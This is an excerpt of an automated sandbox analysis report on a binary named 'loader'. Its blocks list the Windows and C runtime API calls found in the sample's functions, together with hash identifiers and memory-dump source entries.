                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                      • API String ID: 667068680-295688737
                                                                                      • Opcode ID: 213e2054ff3ebcb3b2ee0bde9d2d02857dc85d887696eac70667c3e66d55cab7
                                                                                      • Instruction ID: 83dc76c25bfe55de3d6e0c70f3328933ac12788a0e8353ac7a004c428678fc24
                                                                                      • Opcode Fuzzy Hash: 213e2054ff3ebcb3b2ee0bde9d2d02857dc85d887696eac70667c3e66d55cab7
                                                                                      • Instruction Fuzzy Hash: 1E6112719B6390ABC7117FF4BD4D8E63BACAB1A7067108416F141D3261DFF460D18BA0
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0024CF90
                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0024D216
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                      • String ID:
                                                                                      • API String ID: 350343453-0
                                                                                      • Opcode ID: 98ddbc906d7a12c26ae99f813a76aef5e5b2a1c2b501bd281773a7ab664fbc5e
                                                                                      • Instruction ID: 4c1da474a2608edec852961904191b3e6dc96119e49f27120da64a7a13f1299d
                                                                                      • Opcode Fuzzy Hash: 98ddbc906d7a12c26ae99f813a76aef5e5b2a1c2b501bd281773a7ab664fbc5e
                                                                                      • Instruction Fuzzy Hash: F0F13B76E605104FEF048A7CC8A83DF6BE28B66334F2B572ADA745B7D2D66744098F40
                                                                                      APIs
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0025C8CB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0025C9BF
                                                                                      • FindClose.KERNEL32(00000000), ref: 0025C9FE
                                                                                      • FindClose.KERNEL32(00000000), ref: 0025CA31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 1164774033-0
                                                                                      • Opcode ID: 0ac46507800b6d513eba1a33ad5dfda917826e5b39ca3397adfeb52abfbbe410
                                                                                      • Instruction ID: 8a084a0f94dc47510f08a333c0f03a039ebc29acd1d6fb72d6180ae3525c3740
                                                                                      • Opcode Fuzzy Hash: 0ac46507800b6d513eba1a33ad5dfda917826e5b39ca3397adfeb52abfbbe410
                                                                                      • Instruction Fuzzy Hash: BB71C67181425D5EDF21EF249C8DABABBB9EF05301F2441D9E849A3251FB308E998F58
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00255450
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0025551C
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0025553C
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00255546
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 93b5212d9976837812b9161a97f9a163d36ed2ae01b1194bacd10665c280e235
                                                                                      • Instruction ID: a55a389b6a7ee64dd59c463825cd4d96488d6977c3c22c43e63f4917ed7daaec
                                                                                      • Opcode Fuzzy Hash: 93b5212d9976837812b9161a97f9a163d36ed2ae01b1194bacd10665c280e235
                                                                                      • Instruction Fuzzy Hash: 29311875D152289BDF10DFA4D9897CDBBB8BF08305F1041AAE40DAB250EBB09A89CF45
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00257EC2
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00257ECC
                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00257ED9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: bb0cb7595f774e8f5df6d7a1fb51a4f195dd81379f5e84fc842396394c2b8bd9
                                                                                      • Instruction ID: 67eb7669607324aed52577ba55fdaef5f6d4394e2d81515cf5b64c590b1c8238
                                                                                      • Opcode Fuzzy Hash: bb0cb7595f774e8f5df6d7a1fb51a4f195dd81379f5e84fc842396394c2b8bd9
                                                                                      • Instruction Fuzzy Hash: 0731C574951229ABCB21DF24DC89BCDBBB8BF08311F5041EAE81CA7250EB709F958F44
                                                                                      APIs
                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00252437
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___std_exception_destroy
                                                                                      • String ID:
                                                                                      • API String ID: 4194217158-0
                                                                                      • Opcode ID: 98a3b43a19792e8d2a4023bccd33b72c272d3be2fdd28ec1dfa2453bb64d2964
                                                                                      • Instruction ID: 9ebecae2b446ba4a77e0783f47b3ae0b0b828577248c876ce7309726eb64010b
                                                                                      • Opcode Fuzzy Hash: 98a3b43a19792e8d2a4023bccd33b72c272d3be2fdd28ec1dfa2453bb64d2964
                                                                                      • Instruction Fuzzy Hash: C8A28966A555844FEF024AB884B93DF6FE24B6B330F6A2755C6F06F2D3D54B000B9B60
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -g}5
                                                                                      • API String ID: 0-4071012034
                                                                                      • Opcode ID: 03164c6941d3069a823d5f634ad23cbd2e09675dee81bad40ccb25d1f8f9e6c2
                                                                                      • Instruction ID: b9bb5dc74078860389ca6171e451f5afeddf2587b3f5914de28edd55b8d576ff
                                                                                      • Opcode Fuzzy Hash: 03164c6941d3069a823d5f634ad23cbd2e09675dee81bad40ccb25d1f8f9e6c2
                                                                                      • Instruction Fuzzy Hash: EB92B8A6A556C45FEF024AB8D4A93DF6FF24B6B331F6E2B5586E01F2D3C147004A9B10
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00261F2D,?,?,00000008,?,?,00261AFF,00000000), ref: 002621FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 70db76f76b5afcfd478efdea1f7f920aa9784cfa2404c4f25aa287b81e78399d
                                                                                      • Instruction ID: a68a102291ce524d837ad7852f67000a085a4a5dca5863a6f50d0251757533db
                                                                                      • Opcode Fuzzy Hash: 70db76f76b5afcfd478efdea1f7f920aa9784cfa2404c4f25aa287b81e78399d
                                                                                      • Instruction Fuzzy Hash: 34B17131120A09DFDB15CF28C49AB657BE0FF45364F258698E999CF2A1C335D9E6CB40
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00255216
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: 7b0efba9e8484f6bfc282a6296ec49e76d7432e0b0ec6d81252c50678b5b31e6
                                                                                      • Instruction ID: 8f67bd55be06f8320cbbf265b511ee6b77c986025b2624de52f8c8973c6b38c1
                                                                                      • Opcode Fuzzy Hash: 7b0efba9e8484f6bfc282a6296ec49e76d7432e0b0ec6d81252c50678b5b31e6
                                                                                      • Instruction Fuzzy Hash: 3951C07192265A8FEB14CF69E8953AABBF4FB08311F24C46AD805EB250D3B09954CF94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: k#fz
                                                                                      • API String ID: 0-1948189604
                                                                                      • Opcode ID: f5e00861869e23783ef46955b4dbdfbc15e711bd2b74abe9e620607a79858c9e
                                                                                      • Instruction ID: 696d7991b37121c49b759a9ae16d29836c8274cb4daf9e923e8319c9d6dc31c3
                                                                                      • Opcode Fuzzy Hash: f5e00861869e23783ef46955b4dbdfbc15e711bd2b74abe9e620607a79858c9e
                                                                                      • Instruction Fuzzy Hash: 86D13472E115188FDB54CEBDC94069DB7F2AB88730F1A8329E875FB2D4D6349D418B80
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 0025543D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 114d877ae4af446c77f949f32f5fde3ad47d6bb4825a18bc89f11f3fa12be58d
                                                                                      • Instruction ID: f40a207ec1b2e88ae004c9d6b456a5d69ae707c044b76b2eff95a725acbcfc0d
                                                                                      • Opcode Fuzzy Hash: 114d877ae4af446c77f949f32f5fde3ad47d6bb4825a18bc89f11f3fa12be58d
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: a970e35ecac712793e8dd6a3ddd4cc186761cce75292a627c538718d504de758
                                                                                      • Instruction ID: c5eac1de58a9ac0ca21a7d4ed51cd82a2c85621a619d9f0bd43d13b4e62f7ae9
                                                                                      • Opcode Fuzzy Hash: a970e35ecac712793e8dd6a3ddd4cc186761cce75292a627c538718d504de758
                                                                                      • Instruction Fuzzy Hash: 15A00170A422018B9B409F76BA0D21A3AA9AA46692715C0A9E445C52A0EEB4A4959B01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e4ba4ef70addc894a218ccea2285737973363f918cd7d055905027e20c6e4c0
                                                                                      • Instruction ID: aa4231dd81698c52bace54ce3a7e569b5d51cd3a8dea20f5bb9e6f3511240a70
                                                                                      • Opcode Fuzzy Hash: 0e4ba4ef70addc894a218ccea2285737973363f918cd7d055905027e20c6e4c0
                                                                                      • Instruction Fuzzy Hash: 6E32D176E542844FEF018ABCC4A83DF6FF25B6A334F2A5719C5A46F3D6D917040A8B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5fd788ffc31222441f78f0f182766613cd0fd4168f5643e9925b07b3afdc1fd9
                                                                                      • Instruction ID: 0b92c06b1fd52ffe900c434701ad44c4be3a87f026b996c9415f8e9194b8b320
                                                                                      • Opcode Fuzzy Hash: 5fd788ffc31222441f78f0f182766613cd0fd4168f5643e9925b07b3afdc1fd9
                                                                                      • Instruction Fuzzy Hash: 8102C477A915504FEF01497CC8B83DB1FE347AB735E2A2726CAB05B2E2C55B000E9B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3336bc549f82a1e5055ae6fd61db86de86ce85cd5e9e5559d4c8c9cc6e57cf47
                                                                                      • Instruction ID: 7660b52fdff9c53aee0f457f60b9ebd5684e0ab00068bd4264481baa5b4552d0
                                                                                      • Opcode Fuzzy Hash: 3336bc549f82a1e5055ae6fd61db86de86ce85cd5e9e5559d4c8c9cc6e57cf47
                                                                                      • Instruction Fuzzy Hash: 7EE11972A605504FDF04897CC5A83DF2FE2476B334F2A2726D9B4AF7D2D65708099B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e32e14c1c3dba0fcfe89a0651b5534778d19656a3728b0023620a680ad15aef3
                                                                                      • Instruction ID: 652bc09cd085bfb9f4c1d5251df8be4246cdb98587d4255780c475ff70d36d7f
                                                                                      • Opcode Fuzzy Hash: e32e14c1c3dba0fcfe89a0651b5534778d19656a3728b0023620a680ad15aef3
                                                                                      • Instruction Fuzzy Hash: 69D0923A645A59AFC311CF49E840D41F7B8FB8D670B158066EA0893B20C371FC51CBE0
                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 002591F2
                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00259300
                                                                                      • CatchIt.LIBVCRUNTIME ref: 00259351
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00259452
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0025946D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                      • String ID: 81&$@]%$csm$csm$csm
                                                                                      • API String ID: 4119006552-818018660
                                                                                      • Opcode ID: d5d38191fc9e013f2827b70110461c23c72bf8186d8ad733146bc7d4c008c73d
                                                                                      • Instruction ID: 6a881bc5a9d96c4377f71d488673dde70a51086b6f1f4a9e43ad7cd75b73018c
                                                                                      • Opcode Fuzzy Hash: d5d38191fc9e013f2827b70110461c23c72bf8186d8ad733146bc7d4c008c73d
                                                                                      • Instruction Fuzzy Hash: 27B1693182021AEFCF15DFA4C8819AEB7B5FF04312B14405AEC156B252D771DEAACF99
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00256167
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0025616F
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 002561F8
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00256223
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00256278
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
